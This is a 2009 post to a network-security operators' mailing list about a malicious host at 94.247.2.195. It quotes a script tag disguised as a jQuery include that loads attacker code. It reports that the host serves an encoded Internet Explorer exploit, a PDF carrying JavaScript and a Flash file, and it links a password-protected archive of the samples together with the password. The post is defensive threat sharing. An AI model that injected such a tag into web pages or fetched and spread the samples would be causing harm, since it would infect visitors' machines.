[nsp-sec] ATTN AS 12553 malware hosting
Mike Tancsa
mike at sentex.net
Wed Apr 8 12:20:23 EDT 2009
At 11:07 AM 4/8/2009, Jose Nazario wrote:
>On Wed, 8 Apr 2009, Mike Tancsa wrote:
>
>><script src = //94.247.2.195 / jquery.js> </script>
>
>despite the following which says it's benign:
>
>http://wepawet.cs.ucsb.edu/view.php?hash=8f39008bc3088b58c32e1c6f1559ae50&type=js
>
>phoneyc finds an issue. it leads to:
>
> hxxp://94.247.2.195/news/?id=100
>
>which is doubly encoded and leads to some VBS and some JS that looks
>like an IE exploit. AV did not detect the encoded script with any assistance.
>
>but yes, looks malicious even though wepawet was unable to identify it.

I also found a PDF with more embedded JavaScript as well as a Flash
file that it sends to the visitor. None of my AV scanners see
anything wrong with them. If anyone is interested in passing the
files on, they can be found at
http://www.tancsa.com/94.247.2.195.zip
The zip file password is
4sDIe762mghdDHKw
---Mike